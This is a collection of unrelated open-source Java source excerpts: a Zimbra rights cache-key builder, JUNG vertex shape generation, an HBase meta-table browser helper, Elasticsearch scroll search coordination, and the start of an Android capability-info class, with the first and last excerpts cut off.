* GUEST-ACCOUNT-BY-ACCESSKEY := <accesskey>K
*
* ADMIN-FLAG := <USER-FLAG>|<DELEGATED-ADMIN-FLAG>|<GLOABL-ADMIN-FLAG>
*
* USER-FLAG := 0
*
* DELEGATED-ADMIN-FLAG := 1
*
* GLOABL-ADMIN-FLAG := 2
*
* CAN-DELEDATE-NEEDED := 0 | 1
*
* e.g.
* (no space in between segments in the actual key)
* d3a5c239-bac9-45ca-87b3-441a990c931b 0 0
* cv30B19SfmLg1HYQd2CX4qZp908=G 0 0
*/
static String buildCacheKey(Account grantee, Right rightNeeded, boolean canDelegateNeeded) {
if (!rightNeeded.isCacheable())
return null;
//
// to conserve caching slots, cache only user rights and the adminLoginAs admin right
// sanity check in case someone marks arbitrary admin rights cacheable in right xml files
//
if (!rightNeeded.isUserRight() && Admin.R_adminLoginAs != rightNeeded)
return null;
String id = null;
if (grantee instanceof GuestAccount) {
// note: do NOT use account id as part of the cache key for GuestAccount,
// the account id is always 999...
// put "G"/"K" at the end (instead of the beginning) for better key distribution for the hash
id = ((GuestAccount) grantee).getDigest();
if (id != null) {
id = id + "G";
} else {
id = ((GuestAccount) grantee).getAccessKey();
if (id != null) {
id = id + "K";
}
}
} else {
id = grantee.getId();
}
if (id == null) {
// for some weird reason, there is no identifier for the accessing account
ZimbraLog.acl.debug("unable to build cache key: " + grantee.getName());
return null;
}
char adminFlag = grantee.isIsAdminAccount() ? '2' : grantee.isIsDelegatedAdminAccount() ? '1' : '0';
char canDelegate = canDelegateNeeded ? '1' : '0';
return id + adminFlag + canDelegate;
}
}
|
|
/*
* Copyright (c) 2003, the JUNG Project and the Regents of the University of
* California All rights reserved.
*
* This software is open-source under the BSD license; see either "license.txt"
* or http://jung.sourceforge.net/license.txt for a description.
*
* Created on Jul 20, 2004
*/
package edu.uci.ics.jung.visualization;
import java.awt.Shape;
import java.awt.geom.AffineTransform;
import java.awt.geom.Ellipse2D;
import java.awt.geom.GeneralPath;
import java.awt.geom.Point2D;
import java.awt.geom.Rectangle2D;
import java.awt.geom.RoundRectangle2D;
import edu.uci.ics.jung.graph.Vertex;
import edu.uci.ics.jung.graph.decorators.ConstantVertexAspectRatioFunction;
import edu.uci.ics.jung.graph.decorators.ConstantVertexSizeFunction;
import edu.uci.ics.jung.graph.decorators.VertexAspectRatioFunction;
import edu.uci.ics.jung.graph.decorators.VertexSizeFunction;
/**
* A utility class for generating <code>Shape</code>s for drawing vertices.
* The available shapes include rectangles, rounded rectangles, ellipses,
* regular polygons, and regular stars. The dimensions of the requested
* shapes are defined by the specified <code>VertexSizeFunction</code>
* and <code>VertexAspectRatioFunction</code> implementations: the width
* of the bounding box of the shape is given by the vertex size, and the
* height is given by the size multiplied by the vertex's aspect ratio.
*
* @author Joshua O'Madadhain
*/
public class VertexShapeFactory
{
protected VertexSizeFunction vsf;
protected VertexAspectRatioFunction varf;
/**
* Creates a <code>VertexShapeFactory</code> with the specified
* vertex size and aspect ratio functions.
*/
public VertexShapeFactory(VertexSizeFunction vsf, VertexAspectRatioFunction varf)
{
this.vsf = vsf;
this.varf = varf;
}
/**
* Creates a <code>VertexShapeFactory</code> with a constant size of
* 10 and a constant aspect ratio of 1.
*/
public VertexShapeFactory()
{
this(new ConstantVertexSizeFunction(10),
new ConstantVertexAspectRatioFunction(1.0f));
}
private static final Rectangle2D theRectangle = new Rectangle2D.Float();
/**
* Returns a <code>Rectangle2D</code> whose width and
* height are defined by this instance's size and
* aspect ratio functions for this vertex.
*/
public Rectangle2D getRectangle(Vertex v)
{
float width = vsf.getSize(v);
float height = width * varf.getAspectRatio(v);
float h_offset = -(width / 2);
float v_offset = -(height / 2);
theRectangle.setFrame(h_offset, v_offset, width, height);
return theRectangle;
}
private static final Ellipse2D theEllipse = new Ellipse2D.Float();
/**
* Returns a <code>Ellipse2D</code> whose width and
* height are defined by this instance's size and
* aspect ratio functions for this vertex.
*/
public Ellipse2D getEllipse(Vertex v)
{
theEllipse.setFrame(getRectangle(v));
return theEllipse;
}
private static final RoundRectangle2D theRoundRectangle =
new RoundRectangle2D.Float();
/**
* Returns a <code>RoundRectangle2D</code> whose width and
* height are defined by this instance's size and
* aspect ratio functions for this vertex. The arc size is
* set to be half the minimum of the height and width of the frame.
*/
public RoundRectangle2D getRoundRectangle(Vertex v)
{
Rectangle2D frame = getRectangle(v);
float arc_size = (float)Math.min(frame.getHeight(), frame.getWidth()) / 2;
theRoundRectangle.setRoundRect(frame.getX(), frame.getY(),
frame.getWidth(), frame.getHeight(), arc_size, arc_size);
return theRoundRectangle;
}
private static final GeneralPath thePolygon = new GeneralPath();
/**
* Returns a regular <code>num_sides</code>-sided
* <code>Polygon</code> whose bounding
* box's width and height are defined by this instance's size and
* aspect ratio functions for this vertex.
* @param num_sides the number of sides of the polygon; must be >= 3.
*/
public Shape getRegularPolygon(Vertex v, int num_sides)
{
if (num_sides < 3)
throw new IllegalArgumentException("Number of sides must be >= 3");
Rectangle2D frame = getRectangle(v);
float width = (float)frame.getWidth();
float height = (float)frame.getHeight();
// generate coordinates
double angle = 0;
thePolygon.reset();
thePolygon.moveTo(0,0);
thePolygon.lineTo(width, 0);
double theta = (2 * Math.PI) / num_sides;
for (int i = 2; i < num_sides; i++)
{
angle -= theta;
float delta_x = (float) (width * Math.cos(angle));
float delta_y = (float) (width * Math.sin(angle));
Point2D prev = thePolygon.getCurrentPoint();
thePolygon.lineTo((float)prev.getX() + delta_x, (float)prev.getY() + delta_y);
}
thePolygon.closePath();
// scale polygon to be right size, translate to center at (0,0)
Rectangle2D r = thePolygon.getBounds2D();
double scale_x = width / r.getWidth();
double scale_y = height / r.getHeight();
float translationX = (float) (r.getMinX() + r.getWidth()/2);
float translationY = (float) (r.getMinY() + r.getHeight()/2);
AffineTransform at = AffineTransform.getScaleInstance(scale_x, scale_y);
at.translate(-translationX, -translationY);
Shape shape = at.createTransformedShape(thePolygon);
return shape;
}
/**
* Returns a regular <code>Polygon</code> of <code>num_points</code>
* points whose bounding
* box's width and height are defined by this instance's size and
* aspect ratio functions for this vertex.
* @param num_points the number of points of the polygon; must be >= 5.
*/
public Shape getRegularStar(Vertex v, int num_points)
{
if (num_points < 5)
throw new IllegalArgumentException("Number of sides must be >= 5");
Rectangle2D frame = getRectangle(v);
float width = (float) frame.getWidth();
float height = (float) frame.getHeight();
// generate coordinates
double theta = (2 * Math.PI) / num_points;
double angle = -theta/2;
thePolygon.reset();
thePolygon.moveTo(0,0);
float delta_x = width * (float)Math.cos(angle);
float delta_y = width * (float)Math.sin(angle);
Point2D prev = thePolygon.getCurrentPoint();
thePolygon.lineTo((float)prev.getX() + delta_x, (float)prev.getY() + delta_y);
for (int i = 1; i < num_points; i++)
{
angle += theta;
delta_x = width * (float)Math.cos(angle);
delta_y = width * (float)Math.sin(angle);
prev = thePolygon.getCurrentPoint();
thePolygon.lineTo((float)prev.getX() + delta_x, (float)prev.getY() + delta_y);
angle -= theta*2;
delta_x = width * (float)Math.cos(angle);
delta_y = width * (float)Math.sin(angle);
prev = thePolygon.getCurrentPoint();
thePolygon.lineTo((float)prev.getX() + delta_x, (float)prev.getY() + delta_y);
}
thePolygon.closePath();
// scale polygon to be right size, translate to center at (0,0)
Rectangle2D r = thePolygon.getBounds2D();
double scale_x = width / r.getWidth();
double scale_y = height / r.getHeight();
float translationX = (float) (r.getMinX() + r.getWidth()/2);
float translationY = (float) (r.getMinY() + r.getHeight()/2);
AffineTransform at = AffineTransform.getScaleInstance(scale_x, scale_y);
at.translate(-translationX, -translationY);
Shape shape = at.createTransformedShape(thePolygon);
return shape;
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hbase.master.webapp;
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import java.util.stream.StreamSupport;
import javax.servlet.http.HttpServletRequest;
import org.apache.commons.lang3.StringUtils;
import org.apache.commons.lang3.builder.ToStringBuilder;
import org.apache.commons.lang3.builder.ToStringStyle;
import org.apache.hadoop.hbase.CompareOperator;
import org.apache.hadoop.hbase.HConstants;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.client.AdvancedScanResultConsumer;
import org.apache.hadoop.hbase.client.AsyncConnection;
import org.apache.hadoop.hbase.client.AsyncTable;
import org.apache.hadoop.hbase.client.ResultScanner;
import org.apache.hadoop.hbase.client.Scan;
import org.apache.hadoop.hbase.filter.Filter;
import org.apache.hadoop.hbase.filter.FilterList;
import org.apache.hadoop.hbase.filter.PrefixFilter;
import org.apache.hadoop.hbase.filter.SingleColumnValueFilter;
import org.apache.hadoop.hbase.master.RegionState;
import org.apache.hadoop.hbase.util.Bytes;
import org.apache.yetus.audience.InterfaceAudience;
import org.apache.hbase.thirdparty.com.google.common.collect.Iterators;
import org.apache.hbase.thirdparty.io.netty.handler.codec.http.QueryStringEncoder;
/**
* <p>
* Support class for the "Meta Entries" section in {@code resources/hbase-webapps/master/table.jsp}.
* </p>
* <p>
* <b>Interface</b>. This class's intended consumer is {@code table.jsp}. As such, it's primary
* interface is the active {@link HttpServletRequest}, from which it uses the {@code scan_*}
* request parameters. This class supports paging through an optionally filtered view of the
* contents of {@code hbase:meta}. Those filters and the pagination offset are specified via these
* request parameters. It provides helper methods for constructing pagination links.
* <ul>
* <li>{@value #NAME_PARAM} - the name of the table requested. The only table of our concern here
* is {@code hbase:meta}; any other value is effectively ignored by the giant conditional in the
* jsp.</li>
* <li>{@value #SCAN_LIMIT_PARAM} - specifies a limit on the number of region (replicas) rendered
* on the by the table in a single request -- a limit on page size. This corresponds to the
* number of {@link RegionReplicaInfo} objects produced by {@link Results#iterator()}. When a
* value for {@code scan_limit} is invalid or not specified, the default value of
* {@value #SCAN_LIMIT_DEFAULT} is used. In order to avoid excessive resource consumption, a
* maximum value of {@value #SCAN_LIMIT_MAX} is enforced.</li>
* <li>{@value #SCAN_REGION_STATE_PARAM} - an optional filter on {@link RegionState}.</li>
* <li>{@value #SCAN_START_PARAM} - specifies the rowkey at which a scan should start. For usage
* details, see the below section on <b>Pagination</b>.</li>
* <li>{@value #SCAN_TABLE_PARAM} - specifies a filter on the values returned, limiting them to
* regions from a specified table. This parameter is implemented as a prefix filter on the
* {@link Scan}, so in effect it can be used for simple namespace and multi-table matches.</li>
* </ul>
* </p>
* <p>
* <b>Pagination</b>. A single page of results are made available via {@link #getResults()} / an
* instance of {@link Results}. Callers use its {@link Iterator} consume the page of
* {@link RegionReplicaInfo} instances, each of which represents a region or region replica. Helper
* methods are provided for building page navigation controls preserving the user's selected filter
* set: {@link #buildFirstPageUrl()}, {@link #buildNextPageUrl(byte[])}. Pagination is implemented
* using a simple offset + limit system. Offset is provided by the {@value #SCAN_START_PARAM},
* limit via {@value #SCAN_LIMIT_PARAM}. Under the hood, the {@link Scan} is constructed with
* {@link Scan#setMaxResultSize(long)} set to ({@value SCAN_LIMIT_PARAM} +1), while the
* {@link Results} {@link Iterator} honors {@value #SCAN_LIMIT_PARAM}. The +1 allows the caller to
* know if a "next page" is available via {@link Results#hasMoreResults()}. Note that this
* pagination strategy is incomplete when it comes to region replicas and can potentially omit
* rendering replicas that fall between the last rowkey offset and {@code replicaCount % page size}.
* </p>
* <p>
* <b>Error Messages</b>. Any time there's an error parsing user input, a message will be populated
* in {@link #getErrorMessages()}. Any fields which produce an error will have their filter values
* set to the default, except for a value of {@value #SCAN_LIMIT_PARAM} that exceeds
* {@value #SCAN_LIMIT_MAX}, in which case {@value #SCAN_LIMIT_MAX} is used.
* </p>
*/
@InterfaceAudience.Private
public class MetaBrowser {
public static final String NAME_PARAM = "name";
public static final String SCAN_LIMIT_PARAM = "scan_limit";
public static final String SCAN_REGION_STATE_PARAM = "scan_region_state";
public static final String SCAN_START_PARAM = "scan_start";
public static final String SCAN_TABLE_PARAM = "scan_table";
public static final int SCAN_LIMIT_DEFAULT = 10;
public static final int SCAN_LIMIT_MAX = 10_000;
private final AsyncConnection connection;
private final HttpServletRequest request;
private final List<String> errorMessages;
private final String name;
private final Integer scanLimit;
private final RegionState.State scanRegionState;
private final byte[] scanStart;
private final TableName scanTable;
public MetaBrowser(final AsyncConnection connection, final HttpServletRequest request) {
this.connection = connection;
this.request = request;
this.errorMessages = new LinkedList<>();
this.name = resolveName(request);
this.scanLimit = resolveScanLimit(request);
this.scanRegionState = resolveScanRegionState(request);
this.scanStart = resolveScanStart(request);
this.scanTable = resolveScanTable(request);
}
public List<String> getErrorMessages() {
return errorMessages;
}
public String getName() {
return name;
}
public Integer getScanLimit() {
return scanLimit;
}
public byte[] getScanStart() {
return scanStart;
}
public RegionState.State getScanRegionState() {
return scanRegionState;
}
public TableName getScanTable() {
return scanTable;
}
public Results getResults() {
final AsyncTable<AdvancedScanResultConsumer> asyncTable =
connection.getTable(TableName.META_TABLE_NAME);
return new Results(asyncTable.getScanner(buildScan()));
}
@Override
public String toString() {
return new ToStringBuilder(this, ToStringStyle.SHORT_PREFIX_STYLE)
.append("scanStart", scanStart)
.append("scanLimit", scanLimit)
.append("scanTable", scanTable)
.append("scanRegionState", scanRegionState)
.toString();
}
private static String resolveName(final HttpServletRequest request) {
return resolveRequestParameter(request, NAME_PARAM);
}
private Integer resolveScanLimit(final HttpServletRequest request) {
final String requestValueStr = resolveRequestParameter(request, SCAN_LIMIT_PARAM);
if (StringUtils.isBlank(requestValueStr)) {
return null;
}
final Integer requestValue = tryParseInt(requestValueStr);
if (requestValue == null) {
errorMessages.add(buildScanLimitMalformedErrorMessage(requestValueStr));
return null;
}
if (requestValue <= 0) {
errorMessages.add(buildScanLimitLTEQZero(requestValue));
return SCAN_LIMIT_DEFAULT;
}
final int truncatedValue = Math.min(requestValue, SCAN_LIMIT_MAX);
if (requestValue != truncatedValue) {
errorMessages.add(buildScanLimitExceededErrorMessage(requestValue));
}
return truncatedValue;
}
private RegionState.State resolveScanRegionState(final HttpServletRequest request) {
final String requestValueStr = resolveRequestParameter(request, SCAN_REGION_STATE_PARAM);
if (requestValueStr == null) {
return null;
}
final RegionState.State requestValue = tryValueOf(RegionState.State.class, requestValueStr);
if (requestValue == null) {
errorMessages.add(buildScanRegionStateMalformedErrorMessage(requestValueStr));
return null;
}
return requestValue;
}
private static byte[] resolveScanStart(final HttpServletRequest request) {
// TODO: handle replicas that fall between the last rowkey and pagination limit.
final String requestValue = resolveRequestParameter(request, SCAN_START_PARAM);
if (requestValue == null) {
return null;
}
return Bytes.toBytesBinary(requestValue);
}
private static TableName resolveScanTable(final HttpServletRequest request) {
final String requestValue = resolveRequestParameter(request, SCAN_TABLE_PARAM);
if (requestValue == null) {
return null;
}
return TableName.valueOf(requestValue);
}
private static String resolveRequestParameter(final HttpServletRequest request,
final String param) {
if (request == null) {
return null;
}
final String requestValueStrEnc = request.getParameter(param);
if (StringUtils.isBlank(requestValueStrEnc)) {
return null;
}
return urlDecode(requestValueStrEnc);
}
private static Filter buildTableFilter(final TableName tableName) {
return new PrefixFilter(tableName.toBytes());
}
private static Filter buildScanRegionStateFilter(final RegionState.State state) {
return new SingleColumnValueFilter(
HConstants.CATALOG_FAMILY,
HConstants.STATE_QUALIFIER,
CompareOperator.EQUAL,
// use the same serialization strategy as found in MetaTableAccessor#addRegionStateToPut
Bytes.toBytes(state.name()));
}
private Filter buildScanFilter() {
if (scanTable == null && scanRegionState == null) {
return null;
}
final List<Filter> filters = new ArrayList<>(2);
if (scanTable != null) {
filters.add(buildTableFilter(scanTable));
}
if (scanRegionState != null) {
filters.add(buildScanRegionStateFilter(scanRegionState));
}
if (filters.size() == 1) {
return filters.get(0);
}
return new FilterList(FilterList.Operator.MUST_PASS_ALL, filters);
}
private Scan buildScan() {
final Scan metaScan = new Scan()
.addFamily(HConstants.CATALOG_FAMILY)
.readVersions(1)
.setLimit((scanLimit != null ? scanLimit : SCAN_LIMIT_DEFAULT) + 1);
if (scanStart != null) {
metaScan.withStartRow(scanStart, false);
}
final Filter filter = buildScanFilter();
if (filter != null) {
metaScan.setFilter(filter);
}
return metaScan;
}
/**
* Adds {@code value} to {@code encoder} under {@code paramName} when {@code value} is non-null.
*/
private void addParam(final QueryStringEncoder encoder, final String paramName,
final Object value) {
if (value != null) {
encoder.addParam(paramName, value.toString());
}
}
private QueryStringEncoder buildFirstPageEncoder() {
final QueryStringEncoder encoder =
new QueryStringEncoder(request.getRequestURI());
addParam(encoder, NAME_PARAM, name);
addParam(encoder, SCAN_LIMIT_PARAM, scanLimit);
addParam(encoder, SCAN_REGION_STATE_PARAM, scanRegionState);
addParam(encoder, SCAN_TABLE_PARAM, scanTable);
return encoder;
}
public String buildFirstPageUrl() {
return buildFirstPageEncoder().toString();
}
static String buildStartParamFrom(final byte[] lastRow) {
if (lastRow == null) {
return null;
}
return urlEncode(Bytes.toStringBinary(lastRow));
}
public String buildNextPageUrl(final byte[] lastRow) {
final QueryStringEncoder encoder = buildFirstPageEncoder();
final String startRow = buildStartParamFrom(lastRow);
addParam(encoder, SCAN_START_PARAM, startRow);
return encoder.toString();
}
private static String urlEncode(final String val) {
if (StringUtils.isEmpty(val)) {
return null;
}
try {
return URLEncoder.encode(val, StandardCharsets.UTF_8.toString());
} catch (UnsupportedEncodingException e) {
return null;
}
}
private static String urlDecode(final String val) {
if (StringUtils.isEmpty(val)) {
return null;
}
try {
return URLDecoder.decode(val, StandardCharsets.UTF_8.toString());
} catch (UnsupportedEncodingException e) {
return null;
}
}
private static Integer tryParseInt(final String val) {
if (StringUtils.isEmpty(val)) {
return null;
}
try {
return Integer.parseInt(val);
} catch (NumberFormatException e) {
return null;
}
}
private static <T extends Enum<T>> T tryValueOf(final Class<T> clazz,
final String value) {
if (clazz == null || value == null) {
return null;
}
try {
return Enum.valueOf(clazz, value);
} catch (IllegalArgumentException e) {
return null;
}
}
private static String buildScanLimitExceededErrorMessage(final int requestValue) {
return String.format(
"Requested SCAN_LIMIT value %d exceeds maximum value %d.", requestValue, SCAN_LIMIT_MAX);
}
private static String buildScanLimitMalformedErrorMessage(final String requestValue) {
return String.format(
"Requested SCAN_LIMIT value '%s' cannot be parsed as an integer.", requestValue);
}
private static String buildScanLimitLTEQZero(final int requestValue) {
return String.format("Requested SCAN_LIMIT value %d is <= 0.", requestValue);
}
private static String buildScanRegionStateMalformedErrorMessage(final String requestValue) {
return String.format(
"Requested SCAN_REGION_STATE value '%s' cannot be parsed as a RegionState.", requestValue);
}
/**
* Encapsulates the results produced by this {@link MetaBrowser} instance.
*/
public final class Results implements AutoCloseable, Iterable<RegionReplicaInfo> {
private final ResultScanner resultScanner;
private final Iterator<RegionReplicaInfo> sourceIterator;
private Results(final ResultScanner resultScanner) {
this.resultScanner = resultScanner;
this.sourceIterator = StreamSupport.stream(resultScanner.spliterator(), false)
.map(RegionReplicaInfo::from)
.flatMap(Collection::stream)
.iterator();
}
/**
* @return {@code true} when the underlying {@link ResultScanner} is not yet exhausted,
* {@code false} otherwise.
*/
public boolean hasMoreResults() {
return sourceIterator.hasNext();
}
@Override
public void close() {
if (resultScanner != null) {
resultScanner.close();
}
}
@Override public Iterator<RegionReplicaInfo> iterator() {
return Iterators.limit(sourceIterator, scanLimit != null ? scanLimit : SCAN_LIMIT_DEFAULT);
}
}
}
|
|
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.elasticsearch.action.search;
import com.carrotsearch.hppc.IntArrayList;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.message.ParameterizedMessage;
import org.apache.logging.log4j.util.Supplier;
import org.apache.lucene.search.ScoreDoc;
import org.elasticsearch.action.ActionListener;
import org.elasticsearch.cluster.node.DiscoveryNode;
import org.elasticsearch.cluster.node.DiscoveryNodes;
import org.elasticsearch.cluster.service.ClusterService;
import org.elasticsearch.common.util.concurrent.AtomicArray;
import org.elasticsearch.common.util.concurrent.CountDown;
import org.elasticsearch.search.fetch.FetchSearchResult;
import org.elasticsearch.search.fetch.ShardFetchRequest;
import org.elasticsearch.search.internal.InternalScrollSearchRequest;
import org.elasticsearch.search.internal.InternalSearchResponse;
import org.elasticsearch.search.query.QuerySearchResult;
import org.elasticsearch.search.query.ScrollQuerySearchResult;
import java.util.List;
import java.util.concurrent.atomic.AtomicInteger;
import static org.elasticsearch.action.search.TransportSearchHelper.internalScrollSearchRequest;
final class SearchScrollQueryThenFetchAsyncAction extends AbstractAsyncAction {
private final Logger logger;
private final SearchTask task;
private final SearchTransportService searchTransportService;
private final SearchPhaseController searchPhaseController;
private final SearchScrollRequest request;
private final ActionListener<SearchResponse> listener;
private final ParsedScrollId scrollId;
private final DiscoveryNodes nodes;
private volatile AtomicArray<ShardSearchFailure> shardFailures;
final AtomicArray<QuerySearchResult> queryResults;
final AtomicArray<FetchSearchResult> fetchResults;
private volatile ScoreDoc[] sortedShardDocs;
private final AtomicInteger successfulOps;
SearchScrollQueryThenFetchAsyncAction(Logger logger, ClusterService clusterService, SearchTransportService searchTransportService,
SearchPhaseController searchPhaseController, SearchScrollRequest request, SearchTask task,
ParsedScrollId scrollId, ActionListener<SearchResponse> listener) {
this.logger = logger;
this.searchTransportService = searchTransportService;
this.searchPhaseController = searchPhaseController;
this.request = request;
this.task = task;
this.listener = listener;
this.scrollId = scrollId;
this.nodes = clusterService.state().nodes();
this.successfulOps = new AtomicInteger(scrollId.getContext().length);
this.queryResults = new AtomicArray<>(scrollId.getContext().length);
this.fetchResults = new AtomicArray<>(scrollId.getContext().length);
}
private ShardSearchFailure[] buildShardFailures() {
if (shardFailures == null) {
return ShardSearchFailure.EMPTY_ARRAY;
}
List<ShardSearchFailure> failures = shardFailures.asList();
return failures.toArray(new ShardSearchFailure[failures.size()]);
}
// we do our best to return the shard failures, but its ok if its not fully concurrently safe
// we simply try and return as much as possible
private void addShardFailure(final int shardIndex, ShardSearchFailure failure) {
if (shardFailures == null) {
shardFailures = new AtomicArray<>(scrollId.getContext().length);
}
shardFailures.set(shardIndex, failure);
}
public void start() {
if (scrollId.getContext().length == 0) {
listener.onFailure(new SearchPhaseExecutionException("query", "no nodes to search on", ShardSearchFailure.EMPTY_ARRAY));
return;
}
final CountDown counter = new CountDown(scrollId.getContext().length);
ScrollIdForNode[] context = scrollId.getContext();
for (int i = 0; i < context.length; i++) {
ScrollIdForNode target = context[i];
DiscoveryNode node = nodes.get(target.getNode());
if (node != null) {
executeQueryPhase(i, counter, node, target.getScrollId());
} else {
if (logger.isDebugEnabled()) {
logger.debug("Node [{}] not available for scroll request [{}]", target.getNode(), scrollId.getSource());
}
successfulOps.decrementAndGet();
if (counter.countDown()) {
try {
executeFetchPhase();
} catch (Exception e) {
listener.onFailure(new SearchPhaseExecutionException("query", "Fetch failed", e, ShardSearchFailure.EMPTY_ARRAY));
return;
}
}
}
}
}
private void executeQueryPhase(final int shardIndex, final CountDown counter, DiscoveryNode node, final long searchId) {
InternalScrollSearchRequest internalRequest = internalScrollSearchRequest(searchId, request);
searchTransportService.sendExecuteScrollQuery(node, internalRequest, task,
new SearchActionListener<ScrollQuerySearchResult>(null, shardIndex) {
@Override
protected void setSearchShardTarget(ScrollQuerySearchResult response) {
// don't do this - it's part of the response...
assert response.getSearchShardTarget() != null : "search shard target must not be null";
}
@Override
protected void innerOnResponse(ScrollQuerySearchResult result) {
queryResults.setOnce(result.getShardIndex(), result.queryResult());
if (counter.countDown()) {
try {
executeFetchPhase();
} catch (Exception e) {
onFailure(e);
}
}
}
@Override
public void onFailure(Exception t) {
onQueryPhaseFailure(shardIndex, counter, searchId, t);
}
});
}
void onQueryPhaseFailure(final int shardIndex, final CountDown counter, final long searchId, Exception failure) {
if (logger.isDebugEnabled()) {
logger.debug((Supplier<?>) () -> new ParameterizedMessage("[{}] Failed to execute query phase", searchId), failure);
}
addShardFailure(shardIndex, new ShardSearchFailure(failure));
successfulOps.decrementAndGet();
if (counter.countDown()) {
if (successfulOps.get() == 0) {
listener.onFailure(new SearchPhaseExecutionException("query", "all shards failed", failure, buildShardFailures()));
} else {
try {
executeFetchPhase();
} catch (Exception e) {
e.addSuppressed(failure);
listener.onFailure(new SearchPhaseExecutionException("query", "Fetch failed", e, ShardSearchFailure.EMPTY_ARRAY));
}
}
}
}
private void executeFetchPhase() throws Exception {
sortedShardDocs = searchPhaseController.sortDocs(true, queryResults.asList(), queryResults.length());
if (sortedShardDocs.length == 0) {
finishHim(searchPhaseController.reducedQueryPhase(queryResults.asList()));
return;
}
final IntArrayList[] docIdsToLoad = searchPhaseController.fillDocIdsToLoad(queryResults.length(), sortedShardDocs);
SearchPhaseController.ReducedQueryPhase reducedQueryPhase = searchPhaseController.reducedQueryPhase(queryResults.asList());
final ScoreDoc[] lastEmittedDocPerShard = searchPhaseController.getLastEmittedDocPerShard(reducedQueryPhase, sortedShardDocs,
queryResults.length());
final CountDown counter = new CountDown(docIdsToLoad.length);
for (int i = 0; i < docIdsToLoad.length; i++) {
final int index = i;
final IntArrayList docIds = docIdsToLoad[index];
if (docIds != null) {
final QuerySearchResult querySearchResult = queryResults.get(index);
ScoreDoc lastEmittedDoc = lastEmittedDocPerShard[index];
ShardFetchRequest shardFetchRequest = new ShardFetchRequest(querySearchResult.getRequestId(), docIds, lastEmittedDoc);
DiscoveryNode node = nodes.get(querySearchResult.getSearchShardTarget().getNodeId());
searchTransportService.sendExecuteFetchScroll(node, shardFetchRequest, task,
new SearchActionListener<FetchSearchResult>(querySearchResult.getSearchShardTarget(), index) {
@Override
protected void innerOnResponse(FetchSearchResult response) {
fetchResults.setOnce(response.getShardIndex(), response);
if (counter.countDown()) {
finishHim(reducedQueryPhase);
}
}
@Override
public void onFailure(Exception t) {
if (logger.isDebugEnabled()) {
logger.debug("Failed to execute fetch phase", t);
}
successfulOps.decrementAndGet();
if (counter.countDown()) {
finishHim(reducedQueryPhase);
}
}
});
} else {
// the counter is set to the total size of docIdsToLoad which can have null values so we have to count them down too
if (counter.countDown()) {
finishHim(reducedQueryPhase);
}
}
}
}
private void finishHim(SearchPhaseController.ReducedQueryPhase queryPhase) {
try {
final InternalSearchResponse internalResponse = searchPhaseController.merge(true, sortedShardDocs, queryPhase,
fetchResults.asList(), fetchResults::get);
String scrollId = null;
if (request.scroll() != null) {
scrollId = request.scrollId();
}
listener.onResponse(new SearchResponse(internalResponse, scrollId, this.scrollId.getContext().length, successfulOps.get(),
buildTookInMillis(), buildShardFailures()));
} catch (Exception e) {
listener.onFailure(new ReduceSearchPhaseException("fetch", "inner finish failed", e, buildShardFailures()));
}
}
}
|
|
/*
* Copyright (c) 2016 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.ims.internal.uce.common;
import android.os.Parcel;
import android.os.Parcelable;
import android.util.Log;
/** Class for capability discovery information.
* @hide */
public class CapInfo implements Parcelable {
/** IM session support. */
private boolean mImSupported = false;
/** File transfer support. */
private boolean mFtSupported = false;
/** File transfer Thumbnail support. */
private boolean mFtThumbSupported = false;
/** File transfer Store and forward support. */
private boolean mFtSnFSupported = false;
/** File transfer HTTP support. */
private boolean mFtHttpSupported = false;
/** Image sharing support. */
private boolean mIsSupported = false;
/** Video sharing during a CS call support -- IR-74. */
private boolean mVsDuringCSSupported = false;
/** Video sharing outside of voice call support -- IR-84. */
private boolean mVsSupported = false;
/** Social presence support. */
private boolean mSpSupported = false;
/** Presence discovery support. */
private boolean mCdViaPresenceSupported = false;
/** IP voice call support (IR-92/IR-58). */
private boolean mIpVoiceSupported = false;
/** IP video call support (IR-92/IR-58). */
private boolean mIpVideoSupported = false;
/** IP Geo location Pull using File Transfer support. */
private boolean mGeoPullFtSupported = false;
/** IP Geo location Pull support. */
private boolean mGeoPullSupported = false;
/** IP Geo location Push support. */
private boolean mGeoPushSupported = false;
/** Standalone messaging support. */
private boolean mSmSupported = false;
/** Full Store and Forward Group Chat information. */
private boolean mFullSnFGroupChatSupported = false;
/** RCS IP Voice call support . */
private boolean mRcsIpVoiceCallSupported = false;
/** RCS IP Video call support . */
private boolean mRcsIpVideoCallSupported = false;
/** RCS IP Video call support . */
private boolean mRcsIpVideoOnlyCallSupported = false;
/** List of supported extensions. */
private String[] mExts = new String[10];
/** Time used to compute when to query again. */
private long mCapTimestamp = 0;
/**
* Constructor for the CapInfo class.
*/
public CapInfo() {
};
/**
* Checks whether IM is supported.
*/
public boolean isImSupported() {
return mImSupported;
